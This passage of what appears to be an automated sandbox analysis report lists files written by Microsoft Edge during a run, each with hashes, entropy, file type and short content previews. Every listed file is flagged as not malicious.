                                                                                                                                                            SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):35302
                                                                                                                                                            Entropy (8bit):7.99333285466604
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                            MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                            SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                            SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                            SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):57
                                                                                                                                                            Entropy (8bit):4.556488479039065
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                            MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                            SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                            SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                            SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):29
                                                                                                                                                            Entropy (8bit):4.030394788231021
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                            MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                            SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                            SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                            SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:topTraffic_638004170464094982
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):575056
                                                                                                                                                            Entropy (8bit):7.999649474060713
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                            MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                            SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                            SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                            SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):460992
                                                                                                                                                            Entropy (8bit):7.999625908035124
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                            MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                            SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                            SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                            SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):9
                                                                                                                                                            Entropy (8bit):3.169925001442312
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:CMzOn:CM6
                                                                                                                                                            MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                            SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                            SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                            SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:uriCache_
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):179
                                                                                                                                                            Entropy (8bit):4.997579644150377
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclTeOIn:YWLSGTt1o9LuLgfGBPAzkVj/T8lgn
                                                                                                                                                            MD5:C6E7E9968E510E35D3EA75D9834E3268
                                                                                                                                                            SHA1:958F3D4372CA54EB35DDDCC04086C8D4CC8250EE
                                                                                                                                                            SHA-256:689E587E79A77399E8CC1976B6567E94510ADDB03354504D5033716C5A62DE47
                                                                                                                                                            SHA-512:A1EB77459E5526A51FAF22CD663F76034F3DD1470FE2C2F71398E463AFE88693926BD9E3DB294F066516B35FBA9BACEFE4C1CA696A9A2428762CA295EF6598FE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1736301902012677}]}
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):86
                                                                                                                                                            Entropy (8bit):4.389669793590032
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQOn:YQ3Kq9X0dMgAEiLIMn
                                                                                                                                                            MD5:03B6D5E81A4DC4D4E6C27BE1E932B9D9
                                                                                                                                                            SHA1:3C5EF0615314BDB136AB57C90359F1839BDD5C93
                                                                                                                                                            SHA-256:73B017F7C5ECD629AD41D14147D53F7D3D070C5967E1E571811A6DB39F06EACC
                                                                                                                                                            SHA-512:0037EB23CCDBDDE93CFEB7B9A223D59D0872D4EC7F5E3CA4F7767A7301E96E1AF1175980DC4F08531D5571AFB94DF789567588DEB2D6D611C57EE4CC05376547
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":15}
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):23955
                                                                                                                                                            Entropy (8bit):6.048048787523318
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:E1tMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhIwbGTDGjfT35ub/Y3jFd4X:EfMkbJrT8IeQc5d1lbGTDCfL5uTY3JY
                                                                                                                                                            MD5:4E7C799F78E250EB07FCB465E4F98380
                                                                                                                                                            SHA1:4EE7DEB750C34A0C06AEAC463B6A09957295F424
                                                                                                                                                            SHA-256:12391B31B8BC70C3C56369F05F6940AEC768041432F60C4E26201C7839F15EE8
                                                                                                                                                            SHA-512:AE1E9AC6E581FA909383CB01DA867A62620052A7AE32BE1661326C79A5D5871D782BE5783C12D25C5C7721BB09A55F1C7D685BB7916634611904A834162EEA8D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380674699199088","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736201103"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8110
                                                                                                                                                            Entropy (8bit):5.802448102599817
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:asNAD9seiRUfJQKlkDa6qRAq1k8SPxVLZ7VTiq:asNAMCWK2Da6q3QxVNZTiq
                                                                                                                                                            MD5:0DB49AF6BF5D40977295E766B00C560D
                                                                                                                                                            SHA1:9EBCA6F2EB1FBCEA3EBB8D3ACA0D10FBD7ADC27C
                                                                                                                                                            SHA-256:D7CB7D64A0553FFA8D952A9B96A0FCFE18A5DC7559B743B350596801D26AB4DC
                                                                                                                                                            SHA-512:27AB778AF0DEB1915BA474DD193560AE1A859F6A3E58F9413AC840075CF44CE79EF6B6894AB4FCD3B7DCECAE0318E01684FDA614130F47CF0DDC48741858DC4D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_mig
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):8110
                                                                                                                                                            Entropy (8bit):5.802448102599817
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:asNAD9seiRUfJQKlkDa6qRAq1k8SPxVLZ7VTiq:asNAMCWK2Da6q3QxVNZTiq
                                                                                                                                                            MD5:0DB49AF6BF5D40977295E766B00C560D
                                                                                                                                                            SHA1:9EBCA6F2EB1FBCEA3EBB8D3ACA0D10FBD7ADC27C
                                                                                                                                                            SHA-256:D7CB7D64A0553FFA8D952A9B96A0FCFE18A5DC7559B743B350596801D26AB4DC
                                                                                                                                                            SHA-512:27AB778AF0DEB1915BA474DD193560AE1A859F6A3E58F9413AC840075CF44CE79EF6B6894AB4FCD3B7DCECAE0318E01684FDA614130F47CF0DDC48741858DC4D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_mig
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8291
                                                                                                                                                            Entropy (8bit):5.791013339446293
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:fsNAD9seiRUv0j6lkDs6qRAq1k8SPxVLZ7VTiQ:fsNAMYq62Ds6q3QxVNZTiQ
                                                                                                                                                            MD5:EEC67A56BBA977DB73D5CCBD76768A42
                                                                                                                                                            SHA1:4652A6054DB674D0B45BA2E80A6CB6456297470A
                                                                                                                                                            SHA-256:C3A1D33180F9C9EA627749760CF7D78326AE437C9498A5702F60961C18757F92
                                                                                                                                                            SHA-512:E78BCF35A28DC451F9267B4118A9BE929710356D84DACFB87C021273E9E0CD0001F93E136BF08A0C202C268EAFC22485ECE0D6DC200EB189DB54F02A0D90DF40
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Ve
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):22840
                                                                                                                                                            Entropy (8bit):6.045181776419729
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:E1tMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhIwk2DmT35ub/Y3jFd4X:EfMkbJrT8IeQc5d1lk2DmL5uTY3JY
                                                                                                                                                            MD5:FE2502B8EA4D4777D0B439556404397B
                                                                                                                                                            SHA1:4B8E3F16C854115993F81D3473B7664FFEF3FFAC
                                                                                                                                                            SHA-256:BD4AC9BA0376A14AE3D680CC28F5268F35D4303C6B1F40D55D576B4F56AE8170
                                                                                                                                                            SHA-512:C7AAE48AEE9B8439D847285D97C112E44F20D474985232D3A9C63E8CF1507737DF5B977407A49938750028603A19123618A1CAC157674451341A470A05B7584D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380674699199088","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736201103"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2278
                                                                                                                                                            Entropy (8bit):3.8445209896592716
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:uiTrlKxrgx+prxl9Il8usKfbl0AMVkNB+OkHtsd1rc:m7Yxfbl0A8kz+
                                                                                                                                                            MD5:A154F622790EA06BCEF65BC8968DC37D
                                                                                                                                                            SHA1:025E6545F119749D260679A9A6CB8CF38B63E88E
                                                                                                                                                            SHA-256:EDAB928897D519AB7607AB4D8FA29C85DA95AF26469BE422FD13EB5EF21F53E1
                                                                                                                                                            SHA-512:AFA7DC3661432D27673426A04FAB8DD5BE9B223AA4D987EF42F01570E465DACB3EC20F949FCA86B3BE22B27CA5A403136594DB7DAC0A3BD181C89DBA0946AA23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.O.N.x.a.o.9.g.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.y.P.y.4.R.D.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4622
                                                                                                                                                            Entropy (8bit):3.9998927694029756
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:lYxfpeFaYEkGsB8ldBONPYIQmAkJrlLhlM8FdkHm:lqxKaLZsdFQKJrlLhld0m
                                                                                                                                                            MD5:ACA9C7AD1CC10B02D0AE6FF8EDC1D7BA
                                                                                                                                                            SHA1:CA767CA63EE702FEB33D84A956052664CCA7C3E6
                                                                                                                                                            SHA-256:CBD1765DD83675A0D19BC486F4E4FBB5A30948199A3917BA3E733CC3F5C54C37
                                                                                                                                                            SHA-512:0D451CED82563BC960A5F27BA19CF1A2E71989DD3F74141D412F3C6B52C6895B4427DBA98FB1080E330BE9B4444B7786DBFD6BEB0CBCFD8E7C5D3BAAEA348016
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".7.k.l.0.U.I.d.g.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.y.P.y.4.R.D.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2684
                                                                                                                                                            Entropy (8bit):3.905924802322502
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:uiTrlKx68Wa7xDxl9Il8usKfRbJTRZQ4rYA/jhJxyqixrgJnrLSd/vc:adYxfRH64V5JixcJrLv
                                                                                                                                                            MD5:E089C65CA10F2A2C88A2B286FA6EC7A2
                                                                                                                                                            SHA1:0DC625CA4D523A9B3938108B1E8A0F8B6D4B5C95
                                                                                                                                                            SHA-256:067D79A20ACA097122FFCAC65C1CABE263EA20084D0F94B22E9619EE64E735A5
                                                                                                                                                            SHA-512:1AADF5879ABCCE712CA4A8039401B6484C3C77D6A2B77449C3A365FF2BF2E944B0185DE42C76AA359EDEA5B628D2B507D19153257BCA756C1EF2759C5BE8C5B9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".h.D.c.1.g.V.h./.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.y.P.y.4.R.D.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JPEG image data, comment: "Lavc59.36.100", baseline, precision 8, 1280x720, components 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):114963
                                                                                                                                                            Entropy (8bit):7.963603752379406
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:419o92kBIRRecc+HoP7C+gYZbDAaGcMz/M7tHe:r92kB4RGjCkQide
                                                                                                                                                            MD5:31100EB09CAB25F5CADABEAD12D587F4
                                                                                                                                                            SHA1:8D52FDDEA9F3F149F9EA57833D601F799F2F5017
                                                                                                                                                            SHA-256:A65D95065CE603015C70A81816ACF0752B6AD1A5EBA3AF6251BF992F596ECB39
                                                                                                                                                            SHA-512:61C35507BFF77637596E9CC4990B5040CE96C09F5D8057DC9D7B2A9E65747EBB908B52C457BC84BA26453805FFDA5647FB3880EF5A0261470C4CE55808E18EB5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:L:L
